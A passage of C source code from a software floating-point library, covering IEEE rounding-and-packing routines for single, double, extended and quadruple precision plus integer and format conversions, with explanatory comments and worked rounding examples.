integer is returned. 
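| For example, under float_round_nearest_even the pair absZ0 = 6,
| absZ1 = 0x8000000000000000 (the value 6.5) is incremented to 7, and
| the exact-tie mask then clears the low bit, giving 6 (ties-to-even)
| with the inexact flag raised.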
*----------------------------------------------------------------------------*/ static int64_t roundAndPackUint64(flag zSign, uint64_t absZ0, uint64_t absZ1, float_status *status) { int8_t roundingMode; flag roundNearestEven, increment; roundingMode = status->float_rounding_mode; roundNearestEven = (roundingMode == float_round_nearest_even); switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: increment = ((int64_t)absZ1 < 0); break; case float_round_to_zero: increment = 0; break; case float_round_up: increment = !zSign && absZ1; break; case float_round_down: increment = zSign && absZ1; break; case float_round_to_odd: increment = !(absZ0 & 1) && absZ1; break; default: abort(); } if (increment) { ++absZ0; if (absZ0 == 0) { float_raise(float_flag_invalid, status); return UINT64_MAX; } absZ0 &= ~(((uint64_t)(absZ1<<1) == 0) & roundNearestEven); } if (zSign && absZ0) { float_raise(float_flag_invalid, status); return 0; } if (absZ1) { status->float_exception_flags |= float_flag_inexact; } return absZ0; } /*---------------------------------------------------------------------------- | Normalizes the subnormal single-precision floating-point value represented | by the denormalized significand `aSig'. The normalized exponent and | significand are stored at the locations pointed to by `zExpPtr' and | `zSigPtr', respectively. *----------------------------------------------------------------------------*/ static void normalizeFloat32Subnormal(uint32_t aSig, int *zExpPtr, uint32_t *zSigPtr) { int8_t shiftCount; shiftCount = clz32(aSig) - 8; *zSigPtr = aSig<<shiftCount; *zExpPtr = 1 - shiftCount; } /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent `zExp', | and significand `zSig', and returns the proper single-precision floating- | point value corresponding to the abstract input. Ordinarily, the abstract | value is simply rounded and packed into the single-precision format, with | the inexact exception raised if the abstract input cannot be represented | exactly. However, if the abstract value is too large, the overflow and | inexact exceptions are raised and an infinity or maximal finite value is | returned. If the abstract value is too small, the input value is rounded to | a subnormal number, and the underflow and inexact exceptions are raised if | the abstract input cannot be represented exactly as a subnormal single- | precision floating-point number. | The input significand `zSig' has its binary point between bits 30 | and 29, which is 7 bits to the left of the usual location. This shifted | significand must be normalized or smaller. If `zSig' is not normalized, | `zExp' must be 0; in that case, the result returned is a subnormal number, | and it must not require rounding. In the usual case that `zSig' is | normalized, `zExp' must be 1 less than the ``true'' floating-point exponent. | The handling of underflow and overflow follows the IEC/IEEE Standard for | Binary Floating-Point Arithmetic. 
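| For example, with round-to-nearest-even the 7 round bits behave as
| follows: roundBits < 0x40 rounds down, roundBits > 0x40 rounds up,
| and roundBits == 0x40 exactly is a tie that is rounded up and then
| has its lsb cleared by the `roundBits ^ 0x40' mask, i.e. rounded to
| even.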
*----------------------------------------------------------------------------*/ static float32 roundAndPackFloat32(flag zSign, int zExp, uint32_t zSig, float_status *status) { int8_t roundingMode; flag roundNearestEven; int8_t roundIncrement, roundBits; flag isTiny; roundingMode = status->float_rounding_mode; roundNearestEven = ( roundingMode == float_round_nearest_even ); switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: roundIncrement = 0x40; break; case float_round_to_zero: roundIncrement = 0; break; case float_round_up: roundIncrement = zSign ? 0 : 0x7f; break; case float_round_down: roundIncrement = zSign ? 0x7f : 0; break; case float_round_to_odd: roundIncrement = zSig & 0x80 ? 0 : 0x7f; break; default: abort(); break; } roundBits = zSig & 0x7F; if ( 0xFD <= (uint16_t) zExp ) { if ( ( 0xFD < zExp ) || ( ( zExp == 0xFD ) && ( (int32_t) ( zSig + roundIncrement ) < 0 ) ) ) { bool overflow_to_inf = roundingMode != float_round_to_odd && roundIncrement != 0; float_raise(float_flag_overflow | float_flag_inexact, status); return packFloat32(zSign, 0xFF, -!overflow_to_inf); } if ( zExp < 0 ) { if (status->flush_to_zero) { float_raise(float_flag_output_denormal, status); return packFloat32(zSign, 0, 0); } isTiny = (status->float_detect_tininess == float_tininess_before_rounding) || ( zExp < -1 ) || ( zSig + roundIncrement < 0x80000000 ); shift32RightJamming( zSig, - zExp, &zSig ); zExp = 0; roundBits = zSig & 0x7F; if (isTiny && roundBits) { float_raise(float_flag_underflow, status); } if (roundingMode == float_round_to_odd) { /* * For round-to-odd case, the roundIncrement depends on * zSig which just changed. */ roundIncrement = zSig & 0x80 ? 0 : 0x7f; } } } if (roundBits) { status->float_exception_flags |= float_flag_inexact; } zSig = ( zSig + roundIncrement )>>7; zSig &= ~ ( ( ( roundBits ^ 0x40 ) == 0 ) & roundNearestEven ); if ( zSig == 0 ) zExp = 0; return packFloat32( zSign, zExp, zSig ); } /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent `zExp', | and significand `zSig', and returns the proper single-precision floating- | point value corresponding to the abstract input. This routine is just like | `roundAndPackFloat32' except that `zSig' does not have to be normalized. | Bit 31 of `zSig' must be zero, and `zExp' must be 1 less than the ``true'' | floating-point exponent. *----------------------------------------------------------------------------*/ static float32 normalizeRoundAndPackFloat32(flag zSign, int zExp, uint32_t zSig, float_status *status) { int8_t shiftCount; shiftCount = clz32(zSig) - 1; return roundAndPackFloat32(zSign, zExp - shiftCount, zSig<<shiftCount, status); } /*---------------------------------------------------------------------------- | Normalizes the subnormal double-precision floating-point value represented | by the denormalized significand `aSig'. The normalized exponent and | significand are stored at the locations pointed to by `zExpPtr' and | `zSigPtr', respectively. 
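| For example, aSig = 1 (the smallest denormal double significand)
| gives shiftCount = clz64(1) - 11 = 52, so *zSigPtr becomes 1 << 52
| (the implicit-bit position) and *zExpPtr becomes 1 - 52 = -51.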
*----------------------------------------------------------------------------*/ static void normalizeFloat64Subnormal(uint64_t aSig, int *zExpPtr, uint64_t *zSigPtr) { int8_t shiftCount; shiftCount = clz64(aSig) - 11; *zSigPtr = aSig<<shiftCount; *zExpPtr = 1 - shiftCount; } /*---------------------------------------------------------------------------- | Packs the sign `zSign', exponent `zExp', and significand `zSig' into a | double-precision floating-point value, returning the result. After being | shifted into the proper positions, the three fields are simply added | together to form the result. This means that any integer portion of `zSig' | will be added into the exponent. Since a properly normalized significand | will have an integer portion equal to 1, the `zExp' input should be 1 less | than the desired result exponent whenever `zSig' is a complete, normalized | significand. *----------------------------------------------------------------------------*/ static inline float64 packFloat64(flag zSign, int zExp, uint64_t zSig) { return make_float64( ( ( (uint64_t) zSign )<<63 ) + ( ( (uint64_t) zExp )<<52 ) + zSig); } /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent `zExp', | and significand `zSig', and returns the proper double-precision floating- | point value corresponding to the abstract input. Ordinarily, the abstract | value is simply rounded and packed into the double-precision format, with | the inexact exception raised if the abstract input cannot be represented | exactly. However, if the abstract value is too large, the overflow and | inexact exceptions are raised and an infinity or maximal finite value is | returned. If the abstract value is too small, the input value is rounded to | a subnormal number, and the underflow and inexact exceptions are raised if | the abstract input cannot be represented exactly as a subnormal double- | precision floating-point number. | The input significand `zSig' has its binary point between bits 62 | and 61, which is 10 bits to the left of the usual location. This shifted | significand must be normalized or smaller. If `zSig' is not normalized, | `zExp' must be 0; in that case, the result returned is a subnormal number, | and it must not require rounding. In the usual case that `zSig' is | normalized, `zExp' must be 1 less than the ``true'' floating-point exponent. | The handling of underflow and overflow follows the IEC/IEEE Standard for | Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ static float64 roundAndPackFloat64(flag zSign, int zExp, uint64_t zSig, float_status *status) { int8_t roundingMode; flag roundNearestEven; int roundIncrement, roundBits; flag isTiny; roundingMode = status->float_rounding_mode; roundNearestEven = ( roundingMode == float_round_nearest_even ); switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: roundIncrement = 0x200; break; case float_round_to_zero: roundIncrement = 0; break; case float_round_up: roundIncrement = zSign ? 0 : 0x3ff; break; case float_round_down: roundIncrement = zSign ? 0x3ff : 0; break; case float_round_to_odd: roundIncrement = (zSig & 0x400) ? 
0 : 0x3ff; break; default: abort(); } roundBits = zSig & 0x3FF; if ( 0x7FD <= (uint16_t) zExp ) { if ( ( 0x7FD < zExp ) || ( ( zExp == 0x7FD ) && ( (int64_t) ( zSig + roundIncrement ) < 0 ) ) ) { bool overflow_to_inf = roundingMode != float_round_to_odd && roundIncrement != 0; float_raise(float_flag_overflow | float_flag_inexact, status); return packFloat64(zSign, 0x7FF, -(!overflow_to_inf)); } if ( zExp < 0 ) { if (status->flush_to_zero) { float_raise(float_flag_output_denormal, status); return packFloat64(zSign, 0, 0); } isTiny = (status->float_detect_tininess == float_tininess_before_rounding) || ( zExp < -1 ) || ( zSig + roundIncrement < UINT64_C(0x8000000000000000) ); shift64RightJamming( zSig, - zExp, &zSig ); zExp = 0; roundBits = zSig & 0x3FF; if (isTiny && roundBits) { float_raise(float_flag_underflow, status); } if (roundingMode == float_round_to_odd) { /* * For round-to-odd case, the roundIncrement depends on * zSig which just changed. */ roundIncrement = (zSig & 0x400) ? 0 : 0x3ff; } } } if (roundBits) { status->float_exception_flags |= float_flag_inexact; } zSig = ( zSig + roundIncrement )>>10; zSig &= ~ ( ( ( roundBits ^ 0x200 ) == 0 ) & roundNearestEven ); if ( zSig == 0 ) zExp = 0; return packFloat64( zSign, zExp, zSig ); } /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent `zExp', | and significand `zSig', and returns the proper double-precision floating- | point value corresponding to the abstract input. This routine is just like | `roundAndPackFloat64' except that `zSig' does not have to be normalized. | Bit 63 of `zSig' must be zero, and `zExp' must be 1 less than the ``true'' | floating-point exponent. *----------------------------------------------------------------------------*/ static float64 normalizeRoundAndPackFloat64(flag zSign, int zExp, uint64_t zSig, float_status *status) { int8_t shiftCount; shiftCount = clz64(zSig) - 1; return roundAndPackFloat64(zSign, zExp - shiftCount, zSig<<shiftCount, status); } /*---------------------------------------------------------------------------- | Normalizes the subnormal extended double-precision floating-point value | represented by the denormalized significand `aSig'. The normalized exponent | and significand are stored at the locations pointed to by `zExpPtr' and | `zSigPtr', respectively. *----------------------------------------------------------------------------*/ void normalizeFloatx80Subnormal(uint64_t aSig, int32_t *zExpPtr, uint64_t *zSigPtr) { int8_t shiftCount; shiftCount = clz64(aSig); *zSigPtr = aSig<<shiftCount; *zExpPtr = 1 - shiftCount; } /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent `zExp', | and extended significand formed by the concatenation of `zSig0' and `zSig1', | and returns the proper extended double-precision floating-point value | corresponding to the abstract input. Ordinarily, the abstract value is | rounded and packed into the extended double-precision format, with the | inexact exception raised if the abstract input cannot be represented | exactly. However, if the abstract value is too large, the overflow and | inexact exceptions are raised and an infinity or maximal finite value is | returned. 
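| For example, roundingPrecision == 64 masks off the low 11 bits of
| the 64-bit significand (roundMask 0x7FF below), which reproduces the
| 53-bit precision of an x87 register whose precision control field
| selects double precision.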
If the abstract value is too small, the input value is rounded to | a subnormal number, and the underflow and inexact exceptions are raised if | the abstract input cannot be represented exactly as a subnormal extended | double-precision floating-point number. | If `roundingPrecision' is 32 or 64, the result is rounded to the same | number of bits as single or double precision, respectively. Otherwise, the | result is rounded to the full precision of the extended double-precision | format. | The input significand must be normalized or smaller. If the input | significand is not normalized, `zExp' must be 0; in that case, the result | returned is a subnormal number, and it must not require rounding. The | handling of underflow and overflow follows the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ floatx80 roundAndPackFloatx80(int8_t roundingPrecision, flag zSign, int32_t zExp, uint64_t zSig0, uint64_t zSig1, float_status *status) { int8_t roundingMode; flag roundNearestEven, increment, isTiny; int64_t roundIncrement, roundMask, roundBits; roundingMode = status->float_rounding_mode; roundNearestEven = ( roundingMode == float_round_nearest_even ); if ( roundingPrecision == 80 ) goto precision80; if ( roundingPrecision == 64 ) { roundIncrement = UINT64_C(0x0000000000000400); roundMask = UINT64_C(0x00000000000007FF); } else if ( roundingPrecision == 32 ) { roundIncrement = UINT64_C(0x0000008000000000); roundMask = UINT64_C(0x000000FFFFFFFFFF); } else { goto precision80; } zSig0 |= ( zSig1 != 0 ); switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: break; case float_round_to_zero: roundIncrement = 0; break; case float_round_up: roundIncrement = zSign ? 0 : roundMask; break; case float_round_down: roundIncrement = zSign ? 
roundMask : 0; break; default: abort(); } roundBits = zSig0 & roundMask; if ( 0x7FFD <= (uint32_t) ( zExp - 1 ) ) { if ( ( 0x7FFE < zExp ) || ( ( zExp == 0x7FFE ) && ( zSig0 + roundIncrement < zSig0 ) ) ) { goto overflow; } if ( zExp <= 0 ) { if (status->flush_to_zero) { float_raise(float_flag_output_denormal, status); return packFloatx80(zSign, 0, 0); } isTiny = (status->float_detect_tininess == float_tininess_before_rounding) || ( zExp < 0 ) || ( zSig0 <= zSig0 + roundIncrement ); shift64RightJamming( zSig0, 1 - zExp, &zSig0 ); zExp = 0; roundBits = zSig0 & roundMask; if (isTiny && roundBits) { float_raise(float_flag_underflow, status); } if (roundBits) { status->float_exception_flags |= float_flag_inexact; } zSig0 += roundIncrement; if ( (int64_t) zSig0 < 0 ) zExp = 1; roundIncrement = roundMask + 1; if ( roundNearestEven && ( roundBits<<1 == roundIncrement ) ) { roundMask |= roundIncrement; } zSig0 &= ~ roundMask; return packFloatx80( zSign, zExp, zSig0 ); } } if (roundBits) { status->float_exception_flags |= float_flag_inexact; } zSig0 += roundIncrement; if ( zSig0 < roundIncrement ) { ++zExp; zSig0 = UINT64_C(0x8000000000000000); } roundIncrement = roundMask + 1; if ( roundNearestEven && ( roundBits<<1 == roundIncrement ) ) { roundMask |= roundIncrement; } zSig0 &= ~ roundMask; if ( zSig0 == 0 ) zExp = 0; return packFloatx80( zSign, zExp, zSig0 ); precision80: switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: increment = ((int64_t)zSig1 < 0); break; case float_round_to_zero: increment = 0; break; case float_round_up: increment = !zSign && zSig1; break; case float_round_down: increment = zSign && zSig1; break; default: abort(); } if ( 0x7FFD <= (uint32_t) ( zExp - 1 ) ) { if ( ( 0x7FFE < zExp ) || ( ( zExp == 0x7FFE ) && ( zSig0 == UINT64_C(0xFFFFFFFFFFFFFFFF) ) && increment ) ) { roundMask = 0; overflow: float_raise(float_flag_overflow | float_flag_inexact, status); if ( ( roundingMode == float_round_to_zero ) || ( zSign && ( roundingMode == float_round_up ) ) || ( ! zSign && ( roundingMode == float_round_down ) ) ) { return packFloatx80( zSign, 0x7FFE, ~ roundMask ); } return packFloatx80(zSign, floatx80_infinity_high, floatx80_infinity_low); } if ( zExp <= 0 ) { isTiny = (status->float_detect_tininess == float_tininess_before_rounding) || ( zExp < 0 ) || ! 
increment || ( zSig0 < UINT64_C(0xFFFFFFFFFFFFFFFF) ); shift64ExtraRightJamming( zSig0, zSig1, 1 - zExp, &zSig0, &zSig1 ); zExp = 0; if (isTiny && zSig1) { float_raise(float_flag_underflow, status); } if (zSig1) { status->float_exception_flags |= float_flag_inexact; } switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: increment = ((int64_t)zSig1 < 0); break; case float_round_to_zero: increment = 0; break; case float_round_up: increment = !zSign && zSig1; break; case float_round_down: increment = zSign && zSig1; break; default: abort(); } if ( increment ) { ++zSig0; zSig0 &= ~ ( ( (uint64_t) ( zSig1<<1 ) == 0 ) & roundNearestEven ); if ( (int64_t) zSig0 < 0 ) zExp = 1; } return packFloatx80( zSign, zExp, zSig0 ); } } if (zSig1) { status->float_exception_flags |= float_flag_inexact; } if ( increment ) { ++zSig0; if ( zSig0 == 0 ) { ++zExp; zSig0 = UINT64_C(0x8000000000000000); } else { zSig0 &= ~ ( ( (uint64_t) ( zSig1<<1 ) == 0 ) & roundNearestEven ); } } else { if ( zSig0 == 0 ) zExp = 0; } return packFloatx80( zSign, zExp, zSig0 ); } /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent | `zExp', and significand formed by the concatenation of `zSig0' and `zSig1', | and returns the proper extended double-precision floating-point value | corresponding to the abstract input. This routine is just like | `roundAndPackFloatx80' except that the input significand does not have to be | normalized. *----------------------------------------------------------------------------*/ floatx80 normalizeRoundAndPackFloatx80(int8_t roundingPrecision, flag zSign, int32_t zExp, uint64_t zSig0, uint64_t zSig1, float_status *status) { int8_t shiftCount; if ( zSig0 == 0 ) { zSig0 = zSig1; zSig1 = 0; zExp -= 64; } shiftCount = clz64(zSig0); shortShift128Left( zSig0, zSig1, shiftCount, &zSig0, &zSig1 ); zExp -= shiftCount; return roundAndPackFloatx80(roundingPrecision, zSign, zExp, zSig0, zSig1, status); } /*---------------------------------------------------------------------------- | Returns the least-significant 64 fraction bits of the quadruple-precision | floating-point value `a'. *----------------------------------------------------------------------------*/ static inline uint64_t extractFloat128Frac1( float128 a ) { return a.low; } /*---------------------------------------------------------------------------- | Returns the most-significant 48 fraction bits of the quadruple-precision | floating-point value `a'. *----------------------------------------------------------------------------*/ static inline uint64_t extractFloat128Frac0( float128 a ) { return a.high & UINT64_C(0x0000FFFFFFFFFFFF); } /*---------------------------------------------------------------------------- | Returns the exponent bits of the quadruple-precision floating-point value | `a'. *----------------------------------------------------------------------------*/ static inline int32_t extractFloat128Exp( float128 a ) { return ( a.high>>48 ) & 0x7FFF; } /*---------------------------------------------------------------------------- | Returns the sign bit of the quadruple-precision floating-point value `a'. 
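| (Illustrative note: a float128 is represented here by two 64-bit words;
| `high' carries the sign bit, the 15 exponent bits and the most-significant
| 48 fraction bits, while `low' carries the remaining 64 fraction bits.)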
*----------------------------------------------------------------------------*/ static inline flag extractFloat128Sign( float128 a ) { return a.high>>63; } /*---------------------------------------------------------------------------- | Normalizes the subnormal quadruple-precision floating-point value | represented by the denormalized significand formed by the concatenation of | `aSig0' and `aSig1'. The normalized exponent is stored at the location | pointed to by `zExpPtr'. The most significant 49 bits of the normalized | significand are stored at the location pointed to by `zSig0Ptr', and the | least significant 64 bits of the normalized significand are stored at the | location pointed to by `zSig1Ptr'. *----------------------------------------------------------------------------*/ static void normalizeFloat128Subnormal( uint64_t aSig0, uint64_t aSig1, int32_t *zExpPtr, uint64_t *zSig0Ptr, uint64_t *zSig1Ptr ) { int8_t shiftCount; if ( aSig0 == 0 ) { shiftCount = clz64(aSig1) - 15; if ( shiftCount < 0 ) { *zSig0Ptr = aSig1>>( - shiftCount ); *zSig1Ptr = aSig1<<( shiftCount & 63 ); } else { *zSig0Ptr = aSig1<<shiftCount; *zSig1Ptr = 0; } *zExpPtr = - shiftCount - 63; } else { shiftCount = clz64(aSig0) - 15; shortShift128Left( aSig0, aSig1, shiftCount, zSig0Ptr, zSig1Ptr ); *zExpPtr = 1 - shiftCount; } } /*---------------------------------------------------------------------------- | Packs the sign `zSign', the exponent `zExp', and the significand formed | by the concatenation of `zSig0' and `zSig1' into a quadruple-precision | floating-point value, returning the result. After being shifted into the | proper positions, the three fields `zSign', `zExp', and `zSig0' are simply | added together to form the most significant 64 bits of the result. This | means that any integer portion of `zSig0' will be added into the exponent. | Since a properly normalized significand will have an integer portion equal | to 1, the `zExp' input should be 1 less than the desired result exponent | whenever `zSig0' and `zSig1' concatenated form a complete, normalized | significand. *----------------------------------------------------------------------------*/ static inline float128 packFloat128( flag zSign, int32_t zExp, uint64_t zSig0, uint64_t zSig1 ) { float128 z; z.low = zSig1; z.high = ( ( (uint64_t) zSign )<<63 ) + ( ( (uint64_t) zExp )<<48 ) + zSig0; return z; } /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent `zExp', | and extended significand formed by the concatenation of `zSig0', `zSig1', | and `zSig2', and returns the proper quadruple-precision floating-point value | corresponding to the abstract input. Ordinarily, the abstract value is | simply rounded and packed into the quadruple-precision format, with the | inexact exception raised if the abstract input cannot be represented | exactly. However, if the abstract value is too large, the overflow and | inexact exceptions are raised and an infinity or maximal finite value is | returned. If the abstract value is too small, the input value is rounded to | a subnormal number, and the underflow and inexact exceptions are raised if | the abstract input cannot be represented exactly as a subnormal quadruple- | precision floating-point number. | The input significand must be normalized or smaller. If the input | significand is not normalized, `zExp' must be 0; in that case, the result | returned is a subnormal number, and it must not require rounding.
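| (Illustrative note: `zSig2' serves as the round and sticky bits: its
| most-significant bit is the round bit under round-to-nearest, and any
| nonzero `zSig2' marks the result inexact.)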
In the | usual case that the input significand is normalized, `zExp' must be 1 less | than the ``true'' floating-point exponent. The handling of underflow and | overflow follows the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ static float128 roundAndPackFloat128(flag zSign, int32_t zExp, uint64_t zSig0, uint64_t zSig1, uint64_t zSig2, float_status *status) { int8_t roundingMode; flag roundNearestEven, increment, isTiny; roundingMode = status->float_rounding_mode; roundNearestEven = ( roundingMode == float_round_nearest_even ); switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: increment = ((int64_t)zSig2 < 0); break; case float_round_to_zero: increment = 0; break; case float_round_up: increment = !zSign && zSig2; break; case float_round_down: increment = zSign && zSig2; break; case float_round_to_odd: increment = !(zSig1 & 0x1) && zSig2; break; default: abort(); } if ( 0x7FFD <= (uint32_t) zExp ) { if ( ( 0x7FFD < zExp ) || ( ( zExp == 0x7FFD ) && eq128( UINT64_C(0x0001FFFFFFFFFFFF), UINT64_C(0xFFFFFFFFFFFFFFFF), zSig0, zSig1 ) && increment ) ) { float_raise(float_flag_overflow | float_flag_inexact, status); if ( ( roundingMode == float_round_to_zero ) || ( zSign && ( roundingMode == float_round_up ) ) || ( ! zSign && ( roundingMode == float_round_down ) ) || (roundingMode == float_round_to_odd) ) { return packFloat128( zSign, 0x7FFE, UINT64_C(0x0000FFFFFFFFFFFF), UINT64_C(0xFFFFFFFFFFFFFFFF) ); } return packFloat128( zSign, 0x7FFF, 0, 0 ); } if ( zExp < 0 ) { if (status->flush_to_zero) { float_raise(float_flag_output_denormal, status); return packFloat128(zSign, 0, 0, 0); } isTiny = (status->float_detect_tininess == float_tininess_before_rounding) || ( zExp < -1 ) || ! increment || lt128( zSig0, zSig1, UINT64_C(0x0001FFFFFFFFFFFF), UINT64_C(0xFFFFFFFFFFFFFFFF) ); shift128ExtraRightJamming( zSig0, zSig1, zSig2, - zExp, &zSig0, &zSig1, &zSig2 ); zExp = 0; if (isTiny && zSig2) { float_raise(float_flag_underflow, status); } switch (roundingMode) { case float_round_nearest_even: case float_round_ties_away: increment = ((int64_t)zSig2 < 0); break; case float_round_to_zero: increment = 0; break; case float_round_up: increment = !zSign && zSig2; break; case float_round_down: increment = zSign && zSig2; break; case float_round_to_odd: increment = !(zSig1 & 0x1) && zSig2; break; default: abort(); } } } if (zSig2) { status->float_exception_flags |= float_flag_inexact; } if ( increment ) { add128( zSig0, zSig1, 0, 1, &zSig0, &zSig1 ); zSig1 &= ~ ( ( zSig2 + zSig2 == 0 ) & roundNearestEven ); } else { if ( ( zSig0 | zSig1 ) == 0 ) zExp = 0; } return packFloat128( zSign, zExp, zSig0, zSig1 ); } /*---------------------------------------------------------------------------- | Takes an abstract floating-point value having sign `zSign', exponent `zExp', | and significand formed by the concatenation of `zSig0' and `zSig1', and | returns the proper quadruple-precision floating-point value corresponding | to the abstract input. This routine is just like `roundAndPackFloat128' | except that the input significand has fewer bits and does not have to be | normalized. In all cases, `zExp' must be 1 less than the ``true'' floating- | point exponent. 
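| (Illustrative note: when `zSig0' is 0 the implementation first swaps the
| two halves and subtracts 64 from `zExp', so a single leading-zero count on
| the high word then suffices to normalize the significand.)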
*----------------------------------------------------------------------------*/ static float128 normalizeRoundAndPackFloat128(flag zSign, int32_t zExp, uint64_t zSig0, uint64_t zSig1, float_status *status) { int8_t shiftCount; uint64_t zSig2; if ( zSig0 == 0 ) { zSig0 = zSig1; zSig1 = 0; zExp -= 64; } shiftCount = clz64(zSig0) - 15; if ( 0 <= shiftCount ) { zSig2 = 0; shortShift128Left( zSig0, zSig1, shiftCount, &zSig0, &zSig1 ); } else { shift128ExtraRightJamming( zSig0, zSig1, 0, - shiftCount, &zSig0, &zSig1, &zSig2 ); } zExp -= shiftCount; return roundAndPackFloat128(zSign, zExp, zSig0, zSig1, zSig2, status); } /*---------------------------------------------------------------------------- | Returns the result of converting the 32-bit two's complement integer `a' | to the extended double-precision floating-point format. The conversion | is performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic. *----------------------------------------------------------------------------*/ floatx80 int32_to_floatx80(int32_t a, float_status *status) { flag zSign; uint32_t absA; int8_t shiftCount; uint64_t zSig; if ( a == 0 ) return packFloatx80( 0, 0, 0 ); zSign = ( a < 0 ); absA = zSign ? - a : a; shiftCount = clz32(absA) + 32; zSig = absA; return packFloatx80( zSign, 0x403E - shiftCount, zSig<<shiftCount ); } /*---------------------------------------------------------------------------- | Returns the result of converting the 32-bit two's complement integer `a' to | the quadruple-precision floating-point format. The conversion is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float128 int32_to_float128(int32_t a, float_status *status) { flag zSign; uint32_t absA; int8_t shiftCount; uint64_t zSig0; if ( a == 0 ) return packFloat128( 0, 0, 0, 0 ); zSign = ( a < 0 ); absA = zSign ? - a : a; shiftCount = clz32(absA) + 17; zSig0 = absA; return packFloat128( zSign, 0x402E - shiftCount, zSig0<<shiftCount, 0 ); } /*---------------------------------------------------------------------------- | Returns the result of converting the 64-bit two's complement integer `a' | to the extended double-precision floating-point format. The conversion | is performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic. *----------------------------------------------------------------------------*/ floatx80 int64_to_floatx80(int64_t a, float_status *status) { flag zSign; uint64_t absA; int8_t shiftCount; if ( a == 0 ) return packFloatx80( 0, 0, 0 ); zSign = ( a < 0 ); absA = zSign ? - a : a; shiftCount = clz64(absA); return packFloatx80( zSign, 0x403E - shiftCount, absA<<shiftCount ); } /*---------------------------------------------------------------------------- | Returns the result of converting the 64-bit two's complement integer `a' to | the quadruple-precision floating-point format. The conversion is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float128 int64_to_float128(int64_t a, float_status *status) { flag zSign; uint64_t absA; int8_t shiftCount; int32_t zExp; uint64_t zSig0, zSig1; if ( a == 0 ) return packFloat128( 0, 0, 0, 0 ); zSign = ( a < 0 ); absA = zSign ? 
- a : a; shiftCount = clz64(absA) + 49; zExp = 0x406E - shiftCount; if ( 64 <= shiftCount ) { zSig1 = 0; zSig0 = absA; shiftCount -= 64; } else { zSig1 = absA; zSig0 = 0; } shortShift128Left( zSig0, zSig1, shiftCount, &zSig0, &zSig1 ); return packFloat128( zSign, zExp, zSig0, zSig1 ); } /*---------------------------------------------------------------------------- | Returns the result of converting the 64-bit unsigned integer `a' | to the quadruple-precision floating-point format. The conversion is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float128 uint64_to_float128(uint64_t a, float_status *status) { if (a == 0) { return float128_zero; } return normalizeRoundAndPackFloat128(0, 0x406E, 0, a, status); } /*---------------------------------------------------------------------------- | Returns the result of converting the single-precision floating-point value | `a' to the extended double-precision floating-point format. The conversion | is performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic. *----------------------------------------------------------------------------*/ floatx80 float32_to_floatx80(float32 a, float_status *status) { flag aSign; int aExp; uint32_t aSig; a = float32_squash_input_denormal(a, status); aSig = extractFloat32Frac( a ); aExp = extractFloat32Exp( a ); aSign = extractFloat32Sign( a ); if ( aExp == 0xFF ) { if (aSig) { return commonNaNToFloatx80(float32ToCommonNaN(a, status), status); } return packFloatx80(aSign, floatx80_infinity_high, floatx80_infinity_low); } if ( aExp == 0 ) { if ( aSig == 0 ) return packFloatx80( aSign, 0, 0 ); normalizeFloat32Subnormal( aSig, &aExp, &aSig ); } aSig |= 0x00800000; return packFloatx80( aSign, aExp + 0x3F80, ( (uint64_t) aSig )<<40 ); } /*---------------------------------------------------------------------------- | Returns the result of converting the single-precision floating-point value | `a' to the quadruple-precision floating-point format. The conversion is | performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic. *----------------------------------------------------------------------------*/ float128 float32_to_float128(float32 a, float_status *status) { flag aSign; int aExp; uint32_t aSig; a = float32_squash_input_denormal(a, status); aSig = extractFloat32Frac( a ); aExp = extractFloat32Exp( a ); aSign = extractFloat32Sign( a ); if ( aExp == 0xFF ) { if (aSig) { return commonNaNToFloat128(float32ToCommonNaN(a, status), status); } return packFloat128( aSign, 0x7FFF, 0, 0 ); } if ( aExp == 0 ) { if ( aSig == 0 ) return packFloat128( aSign, 0, 0, 0 ); normalizeFloat32Subnormal( aSig, &aExp, &aSig ); --aExp; } return packFloat128( aSign, aExp + 0x3F80, ( (uint64_t) aSig )<<25, 0 ); } /*---------------------------------------------------------------------------- | Returns the remainder of the single-precision floating-point value `a' | with respect to the corresponding value `b'. The operation is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
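| (Worked example: float32_rem(5.0, 2.0) rounds the quotient 2.5 to the
| nearest even integer 2 and returns 5.0 - 2*2.0 = 1.0, while
| float32_rem(5.0, 3.0) rounds 1.66... up to 2 and returns -1.0; the IEEE
| remainder therefore always lies in [-|b|/2, +|b|/2].)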
